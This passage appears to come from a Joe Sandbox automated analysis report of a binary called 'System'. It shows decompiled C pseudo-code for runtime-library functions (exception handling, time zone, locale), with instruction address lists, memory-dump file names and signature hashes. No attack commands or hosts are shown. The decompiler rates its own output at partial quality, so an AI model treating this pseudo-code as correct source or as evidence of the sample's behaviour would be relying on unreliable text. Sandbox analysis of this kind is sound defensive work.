				 *((long long*)(_t294 + 0x38)) = _t292 - 0x78;
				 *((long long*)(_t294 + 0x30)) = _t313;
				 *((long long*)(_t294 + 0x28)) = _t292 - 0x38;
				 *(_t294 + 0x20) = _t316;
				E00007FF67FF6E4C658E8( *((intOrPtr*)(_t249 + 0x7ff6e4c92b60)), _t245, _t261,  *((intOrPtr*)(_t294 + 0x78)),  *((intOrPtr*)(_t219 + 0x28)), _t291);
				_t321 =  *((intOrPtr*)(_t292 - 0x80));
				_t262 = _t261 & 0x0000000f;
				_t303 =  *((intOrPtr*)(_t321 + 8)) -  *((char*)(_t262 + 0x7ff6e4c92b50));
				 *((long long*)(_t321 + 8)) = _t303;
				 *((intOrPtr*)(_t321 + 0x18)) =  *((intOrPtr*)(_t303 - 4));
				_t263 = _t262 & 0x0000000f;
				_t304 = _t303 -  *((char*)(_t263 + 0x7ff6e4c92b50));
				 *((long long*)(_t321 + 8)) = _t304;
				 *((intOrPtr*)(_t321 + 0x1c)) =  *((intOrPtr*)(_t304 - 4));
				_t305 = _t304 -  *((char*)((_t263 & 0x0000000f) + 0x7ff6e4c92b50));
				 *((intOrPtr*)(_t321 + 0x20)) =  *((intOrPtr*)(_t305 - 4));
				_t266 =  *(_t294 + 0x68) + 1;
				 *((long long*)(_t321 + 8)) = _t305;
				_t116 = _t305 + 4; // 0x4
				 *((long long*)(_t321 + 8)) = _t116;
				 *((intOrPtr*)(_t321 + 0x24)) =  *_t305;
				 *(_t294 + 0x68) = _t266;
				if (_t266 -  *((intOrPtr*)(_t292 - 0x40)) < 0) goto 0xe4c660c6;
				if (( *_t316 & 0x00000040) == 0) goto 0xe4c6630b;
				if (E00007FF67FF6E4C6353C(_t316) == 0) goto 0xe4c66361;
				goto 0xe4c6630b;
				if ( *((long long*)(_t292 - 0x10)) <= 0) goto 0xe4c6630b;
				if ( *((char*)(_t292 + 0xf8)) != 0) goto 0xe4c66379;
				_t243 =  *((intOrPtr*)(_t292 + 0x100));
				 *((long long*)(_t294 + 0x38)) = _t313;
				 *((long long*)(_t294 + 0x30)) = _t243;
				 *((long long*)(_t294 + 0x28)) = _t290;
				 *(_t294 + 0x20) = _t316;
				E00007FF67FF6E4C66598( *_t305, _t245, _t321,  *((intOrPtr*)(_t219 + 0x28)), _t291);
				_t162 = E00007FF67FF6E4C64EF8(_t243);
				if ( *((long long*)(_t243 + 0x38)) != 0) goto 0xe4c66379;
				return E00007FF67FF6E4C623B0(_t162,  *((intOrPtr*)((_t263 & 0x0000000f) + 0x7ff6e4c92b60)),  *(_t292 + 0x70) ^ _t294);
			}





































                                                                                                                                                              0x7ff6e4c65e91
                                                                                                                                                              0x7ff6e4c65e99
                                                                                                                                                              0x7ff6e4c65ea0
                                                                                                                                                              0x7ff6e4c65ea7
                                                                                                                                                              0x7ff6e4c65eaa
                                                                                                                                                              0x7ff6e4c65eae
                                                                                                                                                              0x7ff6e4c65ec2
                                                                                                                                                              0x7ff6e4c65ecd
                                                                                                                                                              0x7ff6e4c65ed1
                                                                                                                                                              0x7ff6e4c65ed4
                                                                                                                                                              0x7ff6e4c65edc
                                                                                                                                                              0x7ff6e4c65ee7
                                                                                                                                                              0x7ff6e4c65ee9
                                                                                                                                                              0x7ff6e4c65ef2
                                                                                                                                                              0x7ff6e4c65efe
                                                                                                                                                              0x7ff6e4c65f00
                                                                                                                                                              0x7ff6e4c65f09
                                                                                                                                                              0x7ff6e4c65f0b
                                                                                                                                                              0x7ff6e4c65f10
                                                                                                                                                              0x7ff6e4c65f13
                                                                                                                                                              0x7ff6e4c65f18
                                                                                                                                                              0x7ff6e4c65f22
                                                                                                                                                              0x7ff6e4c65f34
                                                                                                                                                              0x7ff6e4c65f41
                                                                                                                                                              0x7ff6e4c65f5d
                                                                                                                                                              0x7ff6e4c65f63
                                                                                                                                                              0x7ff6e4c65f6f
                                                                                                                                                              0x7ff6e4c65f79
                                                                                                                                                              0x7ff6e4c65f82
                                                                                                                                                              0x7ff6e4c65f8a
                                                                                                                                                              0x7ff6e4c65f95
                                                                                                                                                              0x7ff6e4c65f9b
                                                                                                                                                              0x7ff6e4c65fa5
                                                                                                                                                              0x7ff6e4c65fab
                                                                                                                                                              0x7ff6e4c65fb0
                                                                                                                                                              0x7ff6e4c65fb4
                                                                                                                                                              0x7ff6e4c65fbd
                                                                                                                                                              0x7ff6e4c65fc6
                                                                                                                                                              0x7ff6e4c65fd1
                                                                                                                                                              0x7ff6e4c65fd7
                                                                                                                                                              0x7ff6e4c65fdc
                                                                                                                                                              0x7ff6e4c65fe4
                                                                                                                                                              0x7ff6e4c65feb
                                                                                                                                                              0x7ff6e4c65ff1
                                                                                                                                                              0x7ff6e4c65ffb
                                                                                                                                                              0x7ff6e4c65ffd
                                                                                                                                                              0x7ff6e4c66006
                                                                                                                                                              0x7ff6e4c66011
                                                                                                                                                              0x7ff6e4c6601d
                                                                                                                                                              0x7ff6e4c66029
                                                                                                                                                              0x7ff6e4c6602f
                                                                                                                                                              0x7ff6e4c66044
                                                                                                                                                              0x7ff6e4c6604f
                                                                                                                                                              0x7ff6e4c66059
                                                                                                                                                              0x7ff6e4c6606a
                                                                                                                                                              0x7ff6e4c66074
                                                                                                                                                              0x7ff6e4c6607a
                                                                                                                                                              0x7ff6e4c66084
                                                                                                                                                              0x7ff6e4c6608f
                                                                                                                                                              0x7ff6e4c66094
                                                                                                                                                              0x7ff6e4c66097
                                                                                                                                                              0x7ff6e4c6609c
                                                                                                                                                              0x7ff6e4c660a0
                                                                                                                                                              0x7ff6e4c660a5
                                                                                                                                                              0x7ff6e4c660aa
                                                                                                                                                              0x7ff6e4c660b1
                                                                                                                                                              0x7ff6e4c660bb
                                                                                                                                                              0x7ff6e4c660be
                                                                                                                                                              0x7ff6e4c660c2
                                                                                                                                                              0x7ff6e4c660c6
                                                                                                                                                              0x7ff6e4c660cb
                                                                                                                                                              0x7ff6e4c660d0
                                                                                                                                                              0x7ff6e4c660d6
                                                                                                                                                              0x7ff6e4c660e2
                                                                                                                                                              0x7ff6e4c660f8
                                                                                                                                                              0x7ff6e4c660fb
                                                                                                                                                              0x7ff6e4c66100
                                                                                                                                                              0x7ff6e4c66103
                                                                                                                                                              0x7ff6e4c66106
                                                                                                                                                              0x7ff6e4c6610b
                                                                                                                                                              0x7ff6e4c66111
                                                                                                                                                              0x7ff6e4c66117
                                                                                                                                                              0x7ff6e4c6611b
                                                                                                                                                              0x7ff6e4c6611f
                                                                                                                                                              0x7ff6e4c66123
                                                                                                                                                              0x7ff6e4c66128
                                                                                                                                                              0x7ff6e4c6612d
                                                                                                                                                              0x7ff6e4c66131
                                                                                                                                                              0x7ff6e4c66142
                                                                                                                                                              0x7ff6e4c66145
                                                                                                                                                              0x7ff6e4c6614a
                                                                                                                                                              0x7ff6e4c66157
                                                                                                                                                              0x7ff6e4c6615e
                                                                                                                                                              0x7ff6e4c66160
                                                                                                                                                              0x7ff6e4c6616c
                                                                                                                                                              0x7ff6e4c66174
                                                                                                                                                              0x7ff6e4c6617e
                                                                                                                                                              0x7ff6e4c66185
                                                                                                                                                              0x7ff6e4c66187
                                                                                                                                                              0x7ff6e4c6618d
                                                                                                                                                              0x7ff6e4c66193
                                                                                                                                                              0x7ff6e4c66195
                                                                                                                                                              0x7ff6e4c6619e
                                                                                                                                                              0x7ff6e4c661a3
                                                                                                                                                              0x7ff6e4c661a6
                                                                                                                                                              0x7ff6e4c661b0
                                                                                                                                                              0x7ff6e4c661b2
                                                                                                                                                              0x7ff6e4c661c8
                                                                                                                                                              0x7ff6e4c661cc
                                                                                                                                                              0x7ff6e4c661d3
                                                                                                                                                              0x7ff6e4c661db
                                                                                                                                                              0x7ff6e4c661e6
                                                                                                                                                              0x7ff6e4c661ee
                                                                                                                                                              0x7ff6e4c661f7
                                                                                                                                                              0x7ff6e4c661fc
                                                                                                                                                              0x7ff6e4c66201
                                                                                                                                                              0x7ff6e4c66206
                                                                                                                                                              0x7ff6e4c6620b
                                                                                                                                                              0x7ff6e4c6621e
                                                                                                                                                              0x7ff6e4c66231
                                                                                                                                                              0x7ff6e4c6623a
                                                                                                                                                              0x7ff6e4c6623e
                                                                                                                                                              0x7ff6e4c66246
                                                                                                                                                              0x7ff6e4c66259
                                                                                                                                                              0x7ff6e4c66262
                                                                                                                                                              0x7ff6e4c66266
                                                                                                                                                              0x7ff6e4c66281
                                                                                                                                                              0x7ff6e4c6628e
                                                                                                                                                              0x7ff6e4c66292
                                                                                                                                                              0x7ff6e4c66294
                                                                                                                                                              0x7ff6e4c66298
                                                                                                                                                              0x7ff6e4c6629f
                                                                                                                                                              0x7ff6e4c662a3
                                                                                                                                                              0x7ff6e4c662a7
                                                                                                                                                              0x7ff6e4c662ae
                                                                                                                                                              0x7ff6e4c662b8
                                                                                                                                                              0x7ff6e4c662c7
                                                                                                                                                              0x7ff6e4c662cd
                                                                                                                                                              0x7ff6e4c662d3
                                                                                                                                                              0x7ff6e4c662dc
                                                                                                                                                              0x7ff6e4c662e2
                                                                                                                                                              0x7ff6e4c662eb
                                                                                                                                                              0x7ff6e4c662f3
                                                                                                                                                              0x7ff6e4c662fa
                                                                                                                                                              0x7ff6e4c66301
                                                                                                                                                              0x7ff6e4c66306
                                                                                                                                                              0x7ff6e4c6630b
                                                                                                                                                              0x7ff6e4c66315
                                                                                                                                                              0x7ff6e4c66336

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                              • API String ID: 3523768491-393685449
                                                                                                                                                              • Opcode ID: 09ea2e091c7d5616429a2fa59b1fcb3c4a37a05440188c2e1c138333c29f74db
                                                                                                                                                              • Instruction ID: b15c22b0d21952fb653e101e0962c5bd702c8950c1f167b1faf1eb60749c4060
                                                                                                                                                              • Opcode Fuzzy Hash: 09ea2e091c7d5616429a2fa59b1fcb3c4a37a05440188c2e1c138333c29f74db
                                                                                                                                                              • Instruction Fuzzy Hash: 8FE1AD7BA186828AE7109F39D4803BD77B0FB45F48F108176DA8D87695DF39E485C70A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C7D64C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                              			E00007FF67FF6E4C7D64C(void* __ecx, void* __eflags, intOrPtr* __rax, void* __rdx, signed long long _a8, char _a16, long long _a24, long long _a32) {
				long long _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				void* _t32;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t46;
				void* _t52;
				void* _t53;
				intOrPtr* _t59;
				intOrPtr _t61;
				long long _t62;
				long long _t66;
				long long* _t68;
				intOrPtr* _t69;
				long long _t76;
				signed long long _t84;

				_t59 = __rax;
				E00007FF67FF6E4C7CEC0(_t32);
				_a8 = 0;
				_t69 = _t59;
				_a24 = 0;
				_a32 = 0;
				E00007FF67FF6E4C7CF28(_t59,  &_a8);
				if (_t59 != 0) goto 0xe4c7d7dd;
				E00007FF67FF6E4C7CEC8(_t59,  &_a24);
				if (_t59 != 0) goto 0xe4c7d7dd;
				E00007FF67FF6E4C7CEF8(_t59,  &_a32);
				if (_t59 != 0) goto 0xe4c7d7dd;
				_t76 =  *0xe4cabd30; // 0x0
				E00007FF67FF6E4C76B28(_t59, _t76);
				 *0xe4cabd30 = 0;
				GetTimeZoneInformation(??);
				if (_t59 == 0xffffffff) goto 0xe4c7d7b6;
				_t84 =  *0xe4cabd50 * 0x3c;
				_t52 =  *0xe4cabd96 - _t46; // 0x0
				r8d =  *0xe4cabda4; // 0x0
				 *0xe4cabd40 = 1;
				_a8 = _t84;
				if (_t52 == 0) goto 0xe4c7d6f3;
				_a8 = _t59 + _t84;
				_t53 =  *0xe4cabdea - _t46; // 0x0
				if (_t53 == 0) goto 0xe4c7d70e;
				_t61 =  *0xe4cabdf8; // 0x0
				if (_t61 == 0) goto 0xe4c7d70e;
				goto 0xe4c7d712;
				_a24 = 0;
				_a32 = 0;
				_t41 = E00007FF67FF6E4C6D9DC(_t61);
				r9d = r9d | 0xffffffff;
				_t62 =  &_a16;
				_v48 = _t62;
				_v56 = 0;
				_v64 = 0x3f;
				_v72 =  *_t69;
				E00007FF67FF6E4C7B214();
				if (_t62 == 0) goto 0xe4c7d763;
				if (_a16 != 0) goto 0xe4c7d763;
				 *((intOrPtr*)( *_t69 + 0x3f)) = sil;
				goto 0xe4c7d769;
				 *((intOrPtr*)( *_t69)) = sil;
				r9d = r9d | 0xffffffff;
				_v48 =  &_a16;
				_t66 =  *((intOrPtr*)(_t69 + 8));
				_v56 = 0;
				_v64 = 0x3f;
				_v72 = _t66;
				E00007FF67FF6E4C7B214();
				if (_t66 == 0) goto 0xe4c7d7af;
				if (_a16 != 0) goto 0xe4c7d7af;
				 *((intOrPtr*)( *((intOrPtr*)(_t69 + 8)) + 0x3f)) = sil;
				goto 0xe4c7d7b6;
				_t68 =  *((intOrPtr*)(_t69 + 8));
				 *_t68 = sil;
				_t42 = E00007FF67FF6E4C7CEB8(_t41);
				 *_t68 = _a8;
				_t43 = E00007FF67FF6E4C7CEA8(_t42);
				 *_t68 = _a24;
				_t44 = E00007FF67FF6E4C7CEB0(_t43);
				 *_t68 = _a32;
				return _t44;
			}























                                                                                                                                                              0x7ff6e4c7d64c
                                                                                                                                                              0x7ff6e4c7d658
                                                                                                                                                              0x7ff6e4c7d663
                                                                                                                                                              0x7ff6e4c7d666
                                                                                                                                                              0x7ff6e4c7d669
                                                                                                                                                              0x7ff6e4c7d66c
                                                                                                                                                              0x7ff6e4c7d66f
                                                                                                                                                              0x7ff6e4c7d676
                                                                                                                                                              0x7ff6e4c7d680
                                                                                                                                                              0x7ff6e4c7d687
                                                                                                                                                              0x7ff6e4c7d691
                                                                                                                                                              0x7ff6e4c7d698
                                                                                                                                                              0x7ff6e4c7d69e
                                                                                                                                                              0x7ff6e4c7d6a5
                                                                                                                                                              0x7ff6e4c7d6b1
                                                                                                                                                              0x7ff6e4c7d6b8
                                                                                                                                                              0x7ff6e4c7d6c1
                                                                                                                                                              0x7ff6e4c7d6c7
                                                                                                                                                              0x7ff6e4c7d6d1
                                                                                                                                                              0x7ff6e4c7d6d8
                                                                                                                                                              0x7ff6e4c7d6df
                                                                                                                                                              0x7ff6e4c7d6e5
                                                                                                                                                              0x7ff6e4c7d6e8
                                                                                                                                                              0x7ff6e4c7d6f0
                                                                                                                                                              0x7ff6e4c7d6f3
                                                                                                                                                              0x7ff6e4c7d6fa
                                                                                                                                                              0x7ff6e4c7d6fc
                                                                                                                                                              0x7ff6e4c7d704
                                                                                                                                                              0x7ff6e4c7d70c
                                                                                                                                                              0x7ff6e4c7d712
                                                                                                                                                              0x7ff6e4c7d715
                                                                                                                                                              0x7ff6e4c7d718
                                                                                                                                                              0x7ff6e4c7d729
                                                                                                                                                              0x7ff6e4c7d72d
                                                                                                                                                              0x7ff6e4c7d733
                                                                                                                                                              0x7ff6e4c7d738
                                                                                                                                                              0x7ff6e4c7d73d
                                                                                                                                                              0x7ff6e4c7d745
                                                                                                                                                              0x7ff6e4c7d74c
                                                                                                                                                              0x7ff6e4c7d753
                                                                                                                                                              0x7ff6e4c7d758
                                                                                                                                                              0x7ff6e4c7d75d
                                                                                                                                                              0x7ff6e4c7d761
                                                                                                                                                              0x7ff6e4c7d766
                                                                                                                                                              0x7ff6e4c7d76d
                                                                                                                                                              0x7ff6e4c7d771
                                                                                                                                                              0x7ff6e4c7d77d
                                                                                                                                                              0x7ff6e4c7d783
                                                                                                                                                              0x7ff6e4c7d78a
                                                                                                                                                              0x7ff6e4c7d792
                                                                                                                                                              0x7ff6e4c7d797
                                                                                                                                                              0x7ff6e4c7d79e
                                                                                                                                                              0x7ff6e4c7d7a3
                                                                                                                                                              0x7ff6e4c7d7a9
                                                                                                                                                              0x7ff6e4c7d7ad
                                                                                                                                                              0x7ff6e4c7d7af
                                                                                                                                                              0x7ff6e4c7d7b3
                                                                                                                                                              0x7ff6e4c7d7b9
                                                                                                                                                              0x7ff6e4c7d7be
                                                                                                                                                              0x7ff6e4c7d7c3
                                                                                                                                                              0x7ff6e4c7d7c8
                                                                                                                                                              0x7ff6e4c7d7cd
                                                                                                                                                              0x7ff6e4c7d7d2
                                                                                                                                                              0x7ff6e4c7d7dc

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo$FreeHeapInformationTimeZone
                                                                                                                                                              • String ID: ?
                                                                                                                                                              • API String ID: 428190724-1684325040
                                                                                                                                                              • Opcode ID: 12c00b2d3f9c92e94ece9508e8a459affd6588471d0c51d188c36631ac7a3bcd
                                                                                                                                                              • Instruction ID: cc60cb5ffe1eab277c3535e502845c3d97d0f557632e77af08274667888c8d20
                                                                                                                                                              • Opcode Fuzzy Hash: 12c00b2d3f9c92e94ece9508e8a459affd6588471d0c51d188c36631ac7a3bcd
                                                                                                                                                              • Instruction Fuzzy Hash: 1E61803B95C64386E7609F3198C52A967B0EF84B88F440137EA0DC3AD9DF3ED441874A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C42110 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                              			E00007FF67FF6E4C42110(void* __rax, long long __rbx, long long* __rcx, void* __rdx, long long __rsi) {
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t70;
				intOrPtr _t84;
				void* _t99;
				long long* _t100;
				void* _t104;
				void* _t105;
				void* _t107;
				void* _t110;
				long long _t112;

				_t70 = __rax;
				 *((long long*)(_t107 + 0x10)) = __rbx;
				 *((long long*)(_t107 + 0x18)) = __rsi;
				_t105 = _t107 - 0x47;
				_t100 = __rcx;
				if (__rcx == 0) goto 0xe4c42272;
				if ( *__rcx != 0) goto 0xe4c42272;
				 *((intOrPtr*)(__rax - 0x75)) =  *((intOrPtr*)(__rax - 0x75)) + _t56;
				asm("lock dec eax");
				_t84 =  *((intOrPtr*)(__rdx + 8));
				if (_t84 == 0) goto 0xe4c4216c;
				if ( *((intOrPtr*)(_t84 + 0x28)) != 0) goto 0xe4c42173;
				goto 0xe4c42173;
				E00007FF67FF6E4C60D0C(_t57, _t105 - 0x49);
				r14d = r14d ^ r14d;
				 *((long long*)(_t105 - 0x41)) = _t112;
				 *((intOrPtr*)(_t105 - 0x39)) = r14b;
				 *((long long*)(_t105 - 0x31)) = _t112;
				 *((intOrPtr*)(_t105 - 0x29)) = r14b;
				 *((long long*)(_t105 - 0x21)) = _t112;
				 *((intOrPtr*)(_t105 - 0x19)) = r14w;
				 *((long long*)(_t105 - 0x11)) = _t112;
				 *((intOrPtr*)(_t105 - 9)) = r14w;
				 *((long long*)(_t105 - 1)) = _t112;
				 *((intOrPtr*)(_t105 + 7)) = r14b;
				 *((long long*)(_t105 + 0xf)) = _t112;
				 *((intOrPtr*)(_t105 + 0x17)) = r14b;
				if (0xe4c9f71b == 0) goto 0xe4c4228f;
				E00007FF67FF6E4C612B8(_t70, 0xe4c9f71b, _t105 - 0x49, 0xe4c9f71b);
				 *(__rsi + 8) = r14d;
				 *((long long*)(__rsi)) = 0xe4c89700;
				E00007FF67FF6E4C617C4(0xe4c89700, _t105 + 0x1f, 0xe4c9f71b, _t110);
				asm("movups xmm0, [eax]");
				asm("movups [esi+0x10], xmm0");
				asm("movups xmm1, [eax+0x10]");
				asm("movups [esi+0x20], xmm1");
				 *_t100 = __rsi;
				E00007FF67FF6E4C61324(_t105 - 0x49);
				if ( *((intOrPtr*)(_t105 + 0xf)) == 0) goto 0xe4c4220a;
				E00007FF67FF6E4C69C88(_t56, _t57, 0xe4c9f71b, 0xe4c9f71b, _t112);
				 *((long long*)(_t105 + 0xf)) = _t112;
				if ( *((intOrPtr*)(_t105 - 1)) == 0) goto 0xe4c4221c;
				E00007FF67FF6E4C69C88(_t56, _t57, 0xe4c9f71b, 0xe4c9f71b, _t99);
				 *((long long*)(_t105 - 1)) = _t112;
				if ( *((intOrPtr*)(_t105 - 0x11)) == 0) goto 0xe4c4222e;
				E00007FF67FF6E4C69C88(_t56, _t57, 0xe4c9f71b, 0xe4c9f71b, _t104);
				 *((long long*)(_t105 - 0x11)) = _t112;
				if ( *((intOrPtr*)(_t105 - 0x21)) == 0) goto 0xe4c42240;
				E00007FF67FF6E4C69C88(_t56, _t57, 0xe4c9f71b, 0xe4c9f71b);
				 *((long long*)(_t105 - 0x21)) = _t112;
				if ( *((intOrPtr*)(_t105 - 0x31)) == 0) goto 0xe4c42252;
				E00007FF67FF6E4C69C88(_t56, _t57, 0xe4c9f71b, 0xe4c9f71b);
				 *((long long*)(_t105 - 0x31)) = _t112;
				if ( *((intOrPtr*)(_t105 - 0x41)) == 0) goto 0xe4c42264;
				_t53 = E00007FF67FF6E4C69C88(_t56, _t57, 0xe4c9f71b, 0xe4c9f71b);
				 *((long long*)(_t105 - 0x41)) = _t112;
				E00007FF67FF6E4C60D84(_t53, _t105 - 0x49);
				 *0x2 =  *0x2;
				return 0;
			}















                                                                                                                                                              0x7ff6e4c42110
                                                                                                                                                              0x7ff6e4c42110
                                                                                                                                                              0x7ff6e4c42115
                                                                                                                                                              0x7ff6e4c4211e
                                                                                                                                                              0x7ff6e4c4212d
                                                                                                                                                              0x7ff6e4c42133
                                                                                                                                                              0x7ff6e4c4213d
                                                                                                                                                              0x7ff6e4c4214c
                                                                                                                                                              0x7ff6e4c4214f
                                                                                                                                                              0x7ff6e4c42154
                                                                                                                                                              0x7ff6e4c4215b
                                                                                                                                                              0x7ff6e4c42164
                                                                                                                                                              0x7ff6e4c4216a
                                                                                                                                                              0x7ff6e4c42179
                                                                                                                                                              0x7ff6e4c4217f
                                                                                                                                                              0x7ff6e4c42182
                                                                                                                                                              0x7ff6e4c42186
                                                                                                                                                              0x7ff6e4c4218a
                                                                                                                                                              0x7ff6e4c4218e
                                                                                                                                                              0x7ff6e4c42192
                                                                                                                                                              0x7ff6e4c42196
                                                                                                                                                              0x7ff6e4c4219b
                                                                                                                                                              0x7ff6e4c4219f
                                                                                                                                                              0x7ff6e4c421a4
                                                                                                                                                              0x7ff6e4c421a8
                                                                                                                                                              0x7ff6e4c421ac
                                                                                                                                                              0x7ff6e4c421b0
                                                                                                                                                              0x7ff6e4c421b7
                                                                                                                                                              0x7ff6e4c421c4
                                                                                                                                                              0x7ff6e4c421ca
                                                                                                                                                              0x7ff6e4c421d5
                                                                                                                                                              0x7ff6e4c421dc
                                                                                                                                                              0x7ff6e4c421e1
                                                                                                                                                              0x7ff6e4c421e4
                                                                                                                                                              0x7ff6e4c421e8
                                                                                                                                                              0x7ff6e4c421ec
                                                                                                                                                              0x7ff6e4c421f0
                                                                                                                                                              0x7ff6e4c421f7
                                                                                                                                                              0x7ff6e4c42203
                                                                                                                                                              0x7ff6e4c42205
                                                                                                                                                              0x7ff6e4c4220a
                                                                                                                                                              0x7ff6e4c42215
                                                                                                                                                              0x7ff6e4c42217
                                                                                                                                                              0x7ff6e4c4221c
                                                                                                                                                              0x7ff6e4c42227
                                                                                                                                                              0x7ff6e4c42229
                                                                                                                                                              0x7ff6e4c4222e
                                                                                                                                                              0x7ff6e4c42239
                                                                                                                                                              0x7ff6e4c4223b
                                                                                                                                                              0x7ff6e4c42240
                                                                                                                                                              0x7ff6e4c4224b
                                                                                                                                                              0x7ff6e4c4224d
                                                                                                                                                              0x7ff6e4c42252
                                                                                                                                                              0x7ff6e4c4225d
                                                                                                                                                              0x7ff6e4c4225f
                                                                                                                                                              0x7ff6e4c42264
                                                                                                                                                              0x7ff6e4c4226c
                                                                                                                                                              0x7ff6e4c4227d
                                                                                                                                                              0x7ff6e4c4228e

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                              • API String ID: 2967684691-1405518554
                                                                                                                                                              • Opcode ID: e0cf0045b0896272467011533fd110d2f4ac2caf957b59f9d38493c0c4301497
                                                                                                                                                              • Instruction ID: 1884ebbe64f6b7e0eb1abf87e108cd76c47b96cd7e6b45e01487464408542fa4
                                                                                                                                                              • Opcode Fuzzy Hash: e0cf0045b0896272467011533fd110d2f4ac2caf957b59f9d38493c0c4301497
                                                                                                                                                              • Instruction Fuzzy Hash: EF418E2BB89B4299EB14DBB0D4903FC23B4AF84B84F044436DE4DA3A55CE39E516D30A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C88AD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID: 123$123
                                                                                                                                                              • API String ID: 3668304517-1678940097
                                                                                                                                                              • Opcode ID: cc485447ade83df9d018b1fcf8e331f5d977bfac83474ebaa637983910e23bc9
                                                                                                                                                              • Instruction ID: 0eb9b14074bc243edbefc9f759bcaae413c86b3e478a9a40e9244c3044637f2e
                                                                                                                                                              • Opcode Fuzzy Hash: cc485447ade83df9d018b1fcf8e331f5d977bfac83474ebaa637983910e23bc9
                                                                                                                                                              • Instruction Fuzzy Hash: 083163AAE9858740FA089739D8D63782371AF89F84F904833C64E87952DF6E65C4930F
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C71C60 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
